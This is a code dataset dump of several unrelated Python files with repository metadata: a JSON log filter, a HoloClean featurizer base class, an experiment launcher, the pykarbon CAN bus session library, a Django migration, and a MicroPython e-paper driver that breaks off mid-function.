    if filename.endswith(".json"):
        data1 = []
        with open(os.path.join(log_dir, filename)) as json_file:
            data = json.load(json_file)
            core_file = os.path.splitext(filename)[0]
            for item in range(len(data)):
                exists = os.path.isfile(
                    os.path.join(
                        img_dir, os.path.join(core_file, data[item]["image_filename"])
                    )
                )
                if exists:
                    data1.append(data[item])
        with open(os.path.join(log_dir, filename), "w") as outfile:
            json.dump(data1, outfile)
| 32.851852 | 86 | 0.570462 |
795c79975b82f740c3b646348821272d855948da | 826 | py | Python | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | null | null | null | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | 1 | 2018-11-21T06:59:55.000Z | 2018-11-21T06:59:55.000Z | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | null | null | null | from abc import ABCMeta, abstractmethod
from multiprocessing import Pool
class Featurizer(metaclass=ABCMeta):
    """Abstract base class for featurizers.

    Fixed: the original used the Python 2 ``__metaclass__ = ABCMeta`` class
    attribute, which is inert under Python 3, so ``@abstractmethod`` was never
    enforced. Declaring ``metaclass=ABCMeta`` restores the intended contract:
    subclasses must implement specific_setup() and create_tensor().
    """

    def __init__(self, name):
        self.name = name
        self.setup_done = False

    def setup_featurizer(self, dataset, total_vars, classes, processes=20):
        """Bind the dataset/problem dimensions and spin up a worker pool."""
        self.ds = dataset
        self.total_vars = total_vars
        self.classes = classes
        self.pool = Pool(processes)
        self.setup_done = True
        self.specific_setup()

    @abstractmethod
    def specific_setup(self):
        """Subclass hook invoked at the end of setup_featurizer()."""
        raise NotImplementedError

    @abstractmethod
    def create_tensor(self):
        """
        This method creates a tensor which has shape
        [rv_index, (a torch tensor of dimensions classes x features)]
        :return PyTorch Tensor
        """
        raise NotImplementedError
| 25.8125 | 75 | 0.652542 |
795c79d5604ba4884feae539d3fcf791d1da6ad8 | 1,685 | py | Python | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | 13 | 2021-12-08T07:17:55.000Z | 2022-03-30T10:07:38.000Z | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | null | null | null | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | 1 | 2022-01-14T02:56:38.000Z | 2022-01-14T02:56:38.000Z | import experiment1.experiment as experiment1
import experiment2.experiment as experiment2
import argparse
from utils import utils
EXPERIMENTS = [experiment1, experiment2] # experiment 3 will be update
def parse_args():
    """Build and parse the command-line arguments for the ToM experiments."""
    parser = argparse.ArgumentParser('For ToM Passive Exp')
    parser.add_argument('--num_epoch', '-e', type=int, default=100)
    parser.add_argument('--main_exp', '-me', type=int, default=2)
    parser.add_argument('--sub_exp', '-se', type=int, default=1)
    parser.add_argument('--num_agent', '-na', type=int, default=1000)
    parser.add_argument('--batch_size', '-b', type=int, default=32)
    parser.add_argument('--lr', '-l', type=float, default=1e-4)
    parser.add_argument('--alpha', '-a', type=float, default=0.01)
    parser.add_argument('--save_freq', '-s', type=int, default=10)
    parser.add_argument('--train_dir', default='none', type=str)
    parser.add_argument('--eval_dir', default='none', type=str)
    args = parser.parse_args()
    return args
def main(args):
    """Dispatch to the chosen experiment module with the parsed CLI options."""
    experiment_folder = utils.make_folder()
    # main_exp is 1-based on the CLI; EXPERIMENTS is a 0-based list.
    EXPERIMENTS[args.main_exp - 1].run_experiment(num_epoch=args.num_epoch, main_experiment=args.main_exp,
                                                  sub_experiment=args.sub_exp, num_agent=args.num_agent,
                                                  batch_size=args.batch_size, lr=args.lr,
                                                  experiment_folder=experiment_folder,
                                                  alpha=args.alpha, save_freq=args.save_freq,
                                                  train_dir=args.train_dir, eval_dir=args.eval_dir)
if __name__ == '__main__':
    # Script entry point: parse CLI arguments, then launch the experiment.
    args = parse_args()
    main(args)
795c79f9b2ce890c85d960d65da9d3d7b4503497 | 19,746 | py | Python | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 4 | 2020-01-06T17:26:26.000Z | 2021-12-16T09:36:03.000Z | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 2 | 2020-03-27T20:59:21.000Z | 2020-06-26T15:31:49.000Z | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 1 | 2020-03-10T14:11:03.000Z | 2020-03-10T14:11:03.000Z | # -*- coding: utf-8 -*-
''' Tool for running a session with the can interface.
Example:
.. code-block:: python
import pykarbon.can as pkc
from time import sleep
with pkc.Session() as dev:
dev.write(0x123, 0x11223344) # Send a message
sleep(5) # Your code here!
dev.storedata('can_messages') # Save messages that we receive while we waited
Lets us autodetect the can bus baudrate, write data to the can bus, wait for some messages to
be receive, and finally save those messages to can_messages.csv
'''
from time import sleep, time
import threading
import re
import pykarbon.hardware as pk
# Tools --------------------------------------------------------------------------------------------
def stringify(value):
    '''Normalize a hex value (int or str) into a bare upper-case hex string.

    Falsy inputs (None, 0, '') yield the empty string.
    '''
    if not value:
        return ''
    text = hex(value) if isinstance(value, int) else value
    return text.replace('0x', '').upper()
def hexify(value):
    '''Normalize a hex value (int or str) into an int; falsy inputs yield 0.'''
    if not value:
        return 0x0
    if isinstance(value, str):
        return int(value.replace('0x', ''), 16)
    return value
# --------------------------------------------------------------------------------------------------
class Session():
'''Attaches to CAN serial port and allows reading/writing from the port.
Automatically performs port discovery on linux and windows. Then is able to take
ownership of a port and perform read/write operations. Also offers an intelligent
method of sending can messages that will automatically determine frame format, type,
and data length based only on the message id and data.
There is additional support for registering a function to certain can data ids. When the
interface receives a registered message, it will call the function and send the returned
data. This features requires running the session with automonitoring enabled.
By default, the session will also try to automatically discover the bus baudrate.
Arguments:
baudrate (int/str, optional):
`None` -> Disable setting baudrate altogther (use mcu stored value)
`'autobaud'` -> Attempt to automatically detect baudrate
`100 - 1000` -> Set the baudrate to the input value, in thousands
timeout (float, optional): Time until read/write attempts stop in seconds. (None disables)
automon (bool, optional): Automatically monitor incoming data in the background.
reaction_poll_delay (float, optional): Time between checking received data for a registered
value. Decreasing this delay will consume more unused CPU time.
If the baudrate option is left blank, the device will instead attempt to automatically
detect the baudrate of the can-bus. When 'automon' is set to 'True', this object will
immediately attempt to claim the CAN connection that it discovers. Assuming the connection
can be claimed, the session will then start monitoring all incoming data in the background.
This data is stored in the the session's 'data' attribute, and can be popped from the queue
using the 'popdata' method. Additionally, the entire queue may be purged to a csv file using
the 'storedata' method -- it is good practice to occasionally purge the queue.
Attributes:
interface: :class:`pykarbon.hardware.Interface`
pre_data: Data before it has been parsed by the registry service.
data: Queue for holding the data read from the port
isopen: Bool to indicate if the interface is connected
baudrate: Reports the discovered or set baudrate
registry: Dict of registered DIO states and function responses
bgmon: Thread object of the bus background monintor
'''
    def __init__(self, baudrate='autobaud', timeout=.01, automon=True, reaction_poll_delay=.01):
        '''Discovers hardware port name.'''
        self.interface = pk.Interface('can', timeout)
        self.poll_delay = reaction_poll_delay
        self.baudrate = None   # Filled in by autobaud() below, when enabled
        self.pre_data = []     # Raw lines, before the registry service sees them
        self.data = []         # Processed lines available to the user
        self.isopen = False
        self.bgmon = None      # Background monitor thread, set by bgmonitor()
        self.registry = {}     # Maps data ids to registered Reactions

        # baudrate=None skips configuration and keeps the MCU-stored rate.
        if baudrate == 'autobaud':
            self.autobaud(None)
        elif isinstance(baudrate, int):
            self.autobaud(baudrate)

        if automon:
            self.open()
            self.bgmonitor()
        else:
            # Without the background monitor there is no registry service, so
            # reads are delivered straight to the public queue.
            self.data = self.pre_data
    def __enter__(self):
        '''Context-manager entry: claim the serial port if not already open.'''
        if not self.isopen:
            self.interface.__enter__()
            self.isopen = True
        return self
    def open(self):
        '''Claim the interface (only one application may open the serial port)'''
        if not self.isopen:
            self.interface.claim()
            self.isopen = True

        return self.isopen
    def pushdata(self, line: str) -> None:
        '''Add data to the end of the session queue.

        NOTE: Strips EoL characters.

        Args:
            line: Data that will be pushed onto the queue
        '''
        self.data.append(line.strip('\n\r'))
    def autobaud(self, baudrate: int) -> str:
        '''Autodetect the bus baudrate

        If the passed argument 'baudrate' is None, the baudrate will be autodetected,
        otherwise, the bus baudrate will be set to the passed value.

        When attempting to auto-detect baudrate, the system will time-out after 3.5 seconds.

        Args:
            baudrate: The baudrate of the bus in thousands. Set to 'None' to autodetect

        Returns:
            The discovered or set baudrate
        '''
        set_rate = None
        # Baud configuration is done over the terminal port, not the can port.
        with pk.Interface('terminal', timeout=.001) as term:
            if not baudrate:
                term.cwrite('can-autobaud')

                start = time()
                elapsed = 0
                set_rate = term.cread()[0].strip('\n\r')
                # Poll until the device reports a rate or 3.5 s elapse.
                while not set_rate and elapsed < 3.5:
                    set_rate = term.cread()[0].strip('\n\r')
                    elapsed = time() - start
            else:
                term.cwrite('set can-baudrate ' + str(baudrate))
                set_rate = str(baudrate)

        # Device replies like '... 250k'; capture the digits before the 'k'.
        temp = re.search(r'\s(?P<baud>[\d]+)k', set_rate)
        self.baudrate = temp.groupdict()['baud'] if temp else None

        return self.baudrate
    @staticmethod
    def format_message(id, data, **kwargs):
        ''' Takes an id and data and determines other message characteristics

        When keyword arguments are left blank, this function will extrapolate the correct
        frame information based on the characteristics of the passed id and data.

        If desired, all of the automatically determined characteristics may be overwritten.

        Args:
            data_id: Data id of the message, in hex (0x123, '0x123', '123')
            data: Message data, in hex -- if 'None', the device will send a remote frame.
                NOTE: Use string version of hex to send leading zeroes ('0x00C2' or '00C2')
            **kwargs:
                *format*: Use standard or extended frame data id ('std' or 'ext')
                *length*: Length of data to be transmitted, in bytes (11223344 -> 4)
                *type*: Type of frame ('remote' or 'data')
        '''
        # NOTE(review): parameter 'id' shadows the builtin; kept as-is so that
        # keyword callers (id=...) remain compatible.
        data = stringify(data)
        message = {
            # Standard frame ids fit in 11 bits (<= 0x7FF); larger ids are extended.
            'format': kwargs.get('format', 'std' if hexify(id) <= 0x7FF else 'ext'),
            'id': stringify(id),
            # Two hex characters encode one byte.
            'length': kwargs.get('length', int(len(data) / 2)),
            'data': data,
            'type': kwargs.get('type', 'data' if data else 'remote')
        }

        return message
    def send_can(self, message) -> str:
        '''Transmits the passed message on the canbus

        Args:
            message: A dictionary containing the data required to build a can message

        Returns:
            The string version of the transmitted message
        '''
        str_message = '{format} {id} {length} {data} {type}'.format(**message)
        self.interface.cwrite(str_message)

        # Encourage io to actually send packets
        sleep(.0001)

        return str_message
    def register(self, data_id, action, **kwargs):
        '''Automatically perform action upon receiving data_id

        Register an action that should be automatically performed when a certain data
        id is read. By default the action will be performed when the id is attached
        to any frame type, and the action's returned data will be checked -- if the data
        can be formatted as a can message, it will automatically be transmitted as a reply.

        Actions should be a python function, which will be automatically wrapped in a
        pykarbon.can.Reactions object by this function. When the passed action is called
        Reactions will try to pass it the hex id and data as the first and second positional
        arguments. If thrown a TypeError, it will call the action without any arguments.

        Example:
            >>> Session.register(0x123, action)

        Note:
            If the frame is a remote request frame, the passed data will be 'remote' instead
            of an int!

        Args:
            data_id: The hex data_id that the action will be registered to
            action: The python function that will be performed.
            kwargs:
                remote_only: Respond only to remote request frames (Default: False)
                run_in_background: Run action as background task (Default: True)
                auto_response: Automatically reply with returned message (Default: True)

        Returns:
            The 'Reaction' object that will be used in responses to this data_id
        '''
        # Reactions replies via self.write when the action returns message data.
        reaction = Reactions(self.write, data_id, action, **kwargs)
        self.registry[data_id] = reaction

        return reaction
def write(self, can_id, data):
    '''Auto-format and transmit a message.

    Simplest way to put a packet on the bus: only the hex id and hex data
    are needed; every other field of the packet is extrapolated.

    Args:
        can_id: The hex id of the data.
        data: The hex formatted data.
    '''
    self.send_can(self.format_message(can_id, data))
def readline(self):
    '''Read a single line from the port into the pre-processing queue.

    Nothing is queued when the port is closed or returns no data.

    Returns:
        The data read from the port ("" when nothing was read).
    '''
    entry = ""
    if self.isopen:
        entry = self.interface.cread()[0]
        if entry:
            self.pre_data.append(entry)
    return entry
def bgmonitor(self):
    '''Start monitoring the CAN bus in the background.

    Spawns the monitor loop and the registry service as daemon-style
    threads via the threading module.

    Returns:
        The 'thread' object of the background monitor process.
    '''
    if not self.data:
        self.data = []
    self.bgmon = threading.Thread(target=self.monitor)
    self.bgmon.start()
    threading.Thread(target=self.registry_service).start()
    return self.bgmon
def monitor(self):
    '''Watch the port for CAN data while the connection is open.

    The loop is predicated on the connection being open; closing the
    connection stops the monitoring session, as does a user interrupt.

    Returns:
        str: How monitoring stopped -- "SessionClosed" or "UserCancelled".
    '''
    retvl = "SessionClosed"
    while self.isopen:
        try:
            self.readline()
        except KeyboardInterrupt:
            retvl = "UserCancelled"
            # Bugfix: without this break the interrupt was swallowed and the
            # loop kept running, so Ctrl-C could never stop monitoring.
            break
    return retvl
def registry_service(self):
    '''Drain the receive queue, firing registered actions along the way.

    Each line popped from the pre-processing queue is checked against the
    action registry and then moved into the main data queue. Runs until
    the session is closed.
    '''
    while self.isopen:
        # Allow CPU to have time
        sleep(self.poll_delay)
        try:
            entry = self.pre_data.pop(0)
            if entry:
                self.check_action(entry)
                self.pushdata(entry)
        except IndexError:
            continue
    return 0
def check_action(self, line):
    '''Execute the registered reaction for *line*, if one exists.

    Args:
        line: CAN message formatted as '[id] [data]'.
    '''
    parts = line.strip('\n\r').split(' ')
    if len(parts) != 2:
        # Malformed line: silently ignore, matching the ValueError guard.
        return
    raw_id, payload = parts
    key = int(raw_id, 16)
    reaction = self.registry.get(key)
    if reaction is None:
        return
    if reaction.remote_only and ("remote" not in payload):
        return
    if reaction.run_in_background:
        reaction.bgstart(payload)
    else:
        reaction.start(payload)
    return
def storedata(self, filename: str, mode='a+'):
    '''Pop the entire queue and save it to a csv file.

    Clears the whole data queue: after calling this, previously received
    data lives in the specified .csv file instead of the session's 'data'
    attribute. Each received CAN message gets its own 'id,data' line.

    By default data appends to an existing file; pass any standard
    'file.write' mode via *mode* to change that.

    Args:
        filename: Name of the file that will be created.
        mode(str, optional): The file write mode to be used.
    '''
    if '.csv' not in filename:
        filename += '.csv'
    with open(filename, mode) as datafile:
        while True:
            entry = self.popdata()
            if not entry:
                break
            datafile.write(entry.strip('\n\r').replace(' ', ',') + "\n")
def popdata(self):
    '''Pop and return the oldest queued entry (first in, first out).

    Returns:
        The oldest string in the data queue, or "" when the queue is empty.
    '''
    try:
        return self.data.pop(0)
    except IndexError:
        return ""
def close(self):
    '''Release the interface so other sessions may interact with it.

    Any existing background monitor session is also stopped (its loop
    exits once ``isopen`` is False). If this session re-opens the
    connection, background monitoring must be restarted manually with
    'bgmonitor'.
    '''
    self.isopen = False
    try:
        # Bugfix: Thread.isAlive() was removed in Python 3.9; it raised
        # AttributeError and the shutdown grace period was silently skipped.
        # is_alive() is the portable spelling.
        if self.bgmon.is_alive():
            sleep(.1)  # give the monitor thread time to notice isopen == False
    except AttributeError:
        sleep(.001)  # no background monitor was ever started
    self.interface.release()
def __exit__(self, etype, evalue, etraceback):
    '''Context-manager exit: stop monitoring and close the interface.'''
    self.isopen = False
    try:
        # Bugfix: Thread.isAlive() was removed in Python 3.9 -- use
        # is_alive() so the shutdown grace period actually runs.
        if self.bgmon.is_alive():
            sleep(.1)
    except AttributeError:
        sleep(.001)  # no background monitor was ever started
    self.interface.__exit__(etype, evalue, etraceback)
def __del__(self):
    # Destructor safety net: release the interface even if the user
    # forgot to call close() explicitly.
    if self.isopen:
        self.close()
class Reactions():
    '''A class for performing automated responses to certain CAN messages.

    If the action returns a dict of hex id and data, the reaction
    automatically responds with that id and data. If the dict has 'None'
    for id, the reaction responds with the originating frame's id and the
    returned data.

    Note:
        Example action response: {'id': 0x123, 'data': 0x11223344}

    Attributes:
        canwrite: Helper used to write out CAN messages.
        data_id: The CAN data id registered with this reaction.
        action: Function called by this reaction.
        remote_only: If the reaction only responds to remote request frames.
        run_in_background: If the reaction runs as a background thread.
        auto_response: If the reaction automatically replies.
    '''

    def __init__(self, canwrite, data_id, action, **kwargs):
        '''Store the action and configuration, defaulting unset options.

        Unspecified kwargs fall back to their defaults; dict.get replaces
        the original if/else ladder with identical semantics.
        '''
        self.canwrite = canwrite
        self.data_id = data_id
        self.action = action
        self.remote_only = kwargs.get('remote_only', False)
        self.run_in_background = kwargs.get('run_in_background', True)
        self.auto_response = kwargs.get('auto_response', True)

    def start(self, hex_data):
        '''Run the action in a blocking manner.

        Args:
            hex_data: The hex data of the message that invoked this
                reaction, as a string. Should be the string 'remote' for
                remote frames.
        '''
        if not self.remote_only and ('remote' not in hex_data):
            # Normal data frame: hand the action an int (None if empty).
            hex_data = int(hex_data, 16) if hex_data else None
        try:
            out = self.action(self.data_id, hex_data)
        except TypeError:
            # Action does not accept (id, data) -- call without arguments.
            out = self.action()
        return self.respond(out)

    def bgstart(self, hex_data):
        '''Call start as a background thread.

        Returns:
            The thread of the background action.
        '''
        bgaction = threading.Thread(target=self.start, args=[hex_data])
        bgaction.start()
        return bgaction

    def respond(self, returned_data):
        '''Automatically respond to frames, if requested.

        Args:
            returned_data: A dict of id and data. If None (or auto
                response is disabled), no response is sent.
        '''
        if (not returned_data) or (not self.auto_response):
            return
        try:
            if not returned_data['id']:
                # Falsy id: reply on the originating data id.
                self.canwrite(self.data_id, returned_data['data'])
            else:
                self.canwrite(returned_data['id'], returned_data['data'])
        except (TypeError, KeyError) as bad_return:
            print("Bad action response: ", bad_return)
        return
def hardware_reference(device='K300'):
    '''Print useful hardware information (e.g. pinout) for *device*.

    Pinouts assume the user is facing the front of the device with the
    fins pointed up.

    Args:
        device (str, optional): The karbon series being used. Defaults to
            the K300.
    '''
    k300_info = \
        '''
        Info: Compliant with CAN 2.0B. The canbus is not internally terminated; the device
        should be used with properly terminated CAN cables/bus. The termination resistors
        are required to match the nominal impedance of the cable. To meet ISO 11898, this
        resistance should be 120 Ohms.
        Pinout:
            ---------------------
            ||  3  |  2  |  1  ||
            ||  ^     ^     ^  ||
            || |_|   |_|   |_| ||
            || GND | LOW | HGH ||
            ---------------------
        '''
    references = {
        'K300': k300_info,
        'K700': k300_info
    }
    try:
        print(references[device.upper()])
    except KeyError:
        print("Please select from: [K300, K700]")
| 33.298482 | 100 | 0.603261 |
795c79fb074641f862d53020c8d9ca40c5c72a7c | 1,272 | py | Python | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-02-25 06:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Solar and Weather tables.

    Auto-generated by Django 3.0.3; prefer generating follow-up migrations
    over editing this one by hand.
    """

    # First migration for this app.
    initial = True

    # No prior migrations to depend on.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Solar',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('current_power', models.FloatField()),
                ('energy_today', models.FloatField()),
                ('energy_lifetime', models.FloatField()),
                ('summary_date', models.DateTimeField()),
                ('status', models.CharField(max_length=255)),
                # auto_now: refreshed on every save.
                ('time', models.TimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Weather',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.CharField(max_length=255)),
                ('temp', models.FloatField()),
                ('wind_speed', models.FloatField()),
                ('clouds', models.IntegerField()),
                # auto_now: refreshed on every save.
                ('time', models.TimeField(auto_now=True)),
            ],
        ),
    ]
795c7adb4f3a632db9ddc66742da3c69ce8cf882 | 12,716 | py | Python | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | """
MicroPython Waveshare 2.13" Black/White/Red GDEW0213Z16 e-paper display driver
https://github.com/mcauser/micropython-waveshare-epaper
ERRORS ARE FIXED
MIT License
Copyright (c) 2017 Waveshare
Copyright (c) 2018 Mike Causer
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# also works for black/white/yellow GDEW0213C38?
from micropython import const
from time import sleep_ms
import ustruct
# Display resolution (portrait orientation: 104 columns x 212 rows)
EPD_WIDTH = const(104)
EPD_HEIGHT = const(212)

# Display controller command bytes. Commented-out entries are part of the
# controller's command set but unused by this driver.
PANEL_SETTING = const(0x00)
POWER_SETTING = const(0x01)
POWER_OFF = const(0x02)
#POWER_OFF_SEQUENCE_SETTING = const(0x03)
POWER_ON = const(0x04)
#POWER_ON_MEASURE = const(0x05)
BOOSTER_SOFT_START = const(0x06)
#DEEP_SLEEP = const(0x07)
DATA_START_TRANSMISSION_1 = const(0x10)
#DATA_STOP = const(0x11)
DISPLAY_REFRESH = const(0x12)
DATA_START_TRANSMISSION_2 = const(0x13)
#VCOM_LUT = const(0x20) # VCOM LUT(LUTC) (45-byte command, structure of bytes 2~7 repeated)
#W2W_LUT = const(0x21) # W2W LUT (LUTWW) (43-byte command, structure of bytes 2~7 repeated 7 times)
#B2W_LUT = const(0x22) # B2W LUT (LUTBW / LUTR) (43-byte command, structure of bytes 2~7 repeated 7 times)
#W2B_LUT = const(0x23) # W2B LUT (LUTWB / LUTW) (43-byte command, structure of bytes 2~7 repeated 7 times)
#B2B_LUT = const(0x24) # B2B LUT (LUTBB / LUTB) (43-byte command, sturcture of bytes 2~7 repeated 7 times)
#PLL_CONTROL = const(0x30)
#TEMPERATURE_SENSOR_CALIBRATION = const(0x40)
#TEMPERATURE_SENSOR_SELECTION = const(0x41)
#TEMPERATURE_SENSOR_WRITE = const(0x42)
#TEMPERATURE_SENSOR_READ = const(0x43)
VCOM_AND_DATA_INTERVAL_SETTING = const(0x50)
#LOW_POWER_DETECTION = const(0x51)
#TCON_SETTING = const(0x60)
RESOLUTION_SETTING = const(0x61)
#GET_STATUS = const(0x71) # partial update status, i2c status, data received, power status, busy
#AUTO_MEASURE_VCOM = const(0x80)
#VCOM_VALUE = const(0x81)
VCM_DC_SETTING_REGISTER = const(0x82)
#PARTIAL_WINDOW = const(0x90)
#PARTIAL_IN = const(0x91)
#PARTIAL_OUT = const(0x92)
#PROGRAM_MODE = const(0xA0)
#ACTIVE_PROGRAM = const(0xA1)
#READ_OTP_DATA = const(0xA2)
#POWER_SAVING = const(0xE3)

# Display orientation constants used by set_rotate()
ROTATE_0 = const(0)
ROTATE_90 = const(1)
ROTATE_180 = const(2)
ROTATE_270 = const(3)

# Level read on the busy pin while the panel is busy
BUSY = const(0) # 0=busy, 1=idle
class EPD:
    """Driver for the Waveshare 2.13" black/white/red e-paper display (GDEW0213Z16).

    Talks to the panel over SPI plus three control pins (dc, rst, busy) and
    keeps a software rotation state used by the drawing helpers.
    """

    def __init__(self, spi, cs, dc, rst, busy):
        """Bind the SPI bus and control pins and set default geometry.

        Args:
            spi: Initialised SPI bus instance.
            cs: Chip-select pin (output).
            dc: Data/command pin (output; 0 = command, 1 = data).
            rst: Reset pin (output).
            busy: Busy pin (input; 0 = busy, 1 = idle).
        """
        self.spi = spi
        self.cs = cs
        self.dc = dc
        self.rst = rst
        self.busy = busy
        self.cs.init(self.cs.OUT, value=1)
        self.dc.init(self.dc.OUT, value=0)
        self.rst.init(self.rst.OUT, value=0)
        self.busy.init(self.busy.IN)
        self.width = EPD_WIDTH
        self.height = EPD_HEIGHT
        self.rotate = ROTATE_0

    def _command(self, command, data=None):
        """Send one command byte, optionally followed by data bytes."""
        self.dc(0)  # command mode
        self.cs(0)
        self.spi.write(bytearray([command]))
        self.cs(1)
        if data is not None:
            self._data(data)

    def _data(self, data):
        """Send raw data bytes to the controller."""
        self.dc(1)  # data mode
        self.cs(0)
        self.spi.write(data)
        self.cs(1)

    def init(self):
        """Reset and configure the panel (booster, power, resolution)."""
        self.reset()
        self._command(BOOSTER_SOFT_START, b'\x17\x17\x17')
        self._command(POWER_ON)
        self.wait_until_idle()
        self._command(PANEL_SETTING, b'\x8F')  # (128x296, LUT from OTP, B/W/R, scan up, shift right, booster on)
        self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x37')
        self._command(RESOLUTION_SETTING, ustruct.pack(">BH", EPD_WIDTH, EPD_HEIGHT))

    def wait_until_idle(self):
        """Block until the busy pin reports idle."""
        while self.busy.value() == BUSY:
            sleep_ms(100)

    def reset(self):
        """Pulse the hardware reset line."""
        self.rst(0)
        sleep_ms(200)
        self.rst(1)
        sleep_ms(200)

    def display_frame(self, frame_buffer_black, frame_buffer_red):
        """Push the black and red frame buffers to the panel and refresh.

        Either buffer may be None to skip that colour plane.
        """
        if frame_buffer_black is not None:  # idiom fix: was `!= None`
            self._command(DATA_START_TRANSMISSION_1)
            sleep_ms(2)
            for i in range(0, self.width * self.height // 8):
                self._data(bytearray([frame_buffer_black[i]]))
            sleep_ms(2)
        if frame_buffer_red is not None:
            self._command(DATA_START_TRANSMISSION_2)
            sleep_ms(2)
            for i in range(0, self.width * self.height // 8):
                self._data(bytearray([frame_buffer_red[i]]))
            sleep_ms(2)
        self._command(DISPLAY_REFRESH)
        self.wait_until_idle()

    def set_rotate(self, rotate):
        """Set the software rotation, swapping width/height for 90/270."""
        if rotate == ROTATE_0:
            self.rotate = ROTATE_0
            self.width = EPD_WIDTH
            self.height = EPD_HEIGHT
        elif rotate == ROTATE_90:
            self.rotate = ROTATE_90
            self.width = EPD_HEIGHT
            self.height = EPD_WIDTH
        elif rotate == ROTATE_180:
            self.rotate = ROTATE_180
            self.width = EPD_WIDTH
            self.height = EPD_HEIGHT
        elif rotate == ROTATE_270:
            self.rotate = ROTATE_270
            self.width = EPD_HEIGHT
            self.height = EPD_WIDTH

    def set_pixel(self, frame_buffer, x, y, colored):
        """Set a pixel, honoring the current software rotation."""
        if x < 0 or x >= self.width or y < 0 or y >= self.height:
            return
        if self.rotate == ROTATE_0:
            self.set_absolute_pixel(frame_buffer, x, y, colored)
        elif self.rotate == ROTATE_90:
            point_temp = x
            x = EPD_WIDTH - y
            y = point_temp
            self.set_absolute_pixel(frame_buffer, x, y, colored)
        elif self.rotate == ROTATE_180:
            # NOTE(review): mappings use WIDTH - x rather than WIDTH - 1 - x;
            # possible off-by-one inherited from the vendor driver -- confirm.
            x = EPD_WIDTH - x
            y = EPD_HEIGHT - y
            self.set_absolute_pixel(frame_buffer, x, y, colored)
        elif self.rotate == ROTATE_270:
            point_temp = x
            x = y
            y = EPD_HEIGHT - point_temp
            self.set_absolute_pixel(frame_buffer, x, y, colored)

    def set_absolute_pixel(self, frame_buffer, x, y, colored):
        """Set a pixel in panel coordinates (ignores software rotation)."""
        # Use EPD_WIDTH/EPD_HEIGHT (not self.width/height) so that the
        # current display orientation does not affect buffer addressing.
        if x < 0 or x >= EPD_WIDTH or y < 0 or y >= EPD_HEIGHT:
            return
        if colored:
            frame_buffer[(x + y * EPD_WIDTH) // 8] &= ~(0x80 >> (x % 8))
        else:
            frame_buffer[(x + y * EPD_WIDTH) // 8] |= 0x80 >> (x % 8)

    def draw_string_at(self, frame_buffer, x, y, text, font, colored):
        """Render *text* into the frame buffer using a PIL font.

        Bugfix: Image/ImageDraw were referenced but never imported, so this
        method always raised NameError. PIL is imported locally because the
        rest of the driver runs on MicroPython where PIL is unavailable.
        """
        from PIL import Image, ImageDraw
        image = Image.new('1', (self.width, self.height))
        draw = ImageDraw.Draw(image)
        draw.text((x, y), text, font=font, fill=255)
        # Set buffer to value of Python Imaging Library image.
        # Image must be in mode 1.
        pixels = image.load()
        for y in range(self.height):
            for x in range(self.width):
                # Set the bits for the column of pixels at the current position.
                if pixels[x, y] != 0:
                    self.set_pixel(frame_buffer, x, y, colored)

    def draw_line(self, frame_buffer, x0, y0, x1, y1, colored):
        """Draw a line using Bresenham's algorithm.

        Bugfix: the loop condition was `x0 != x1 and y0 != y1`, which made
        horizontal and vertical lines draw nothing and always skipped the
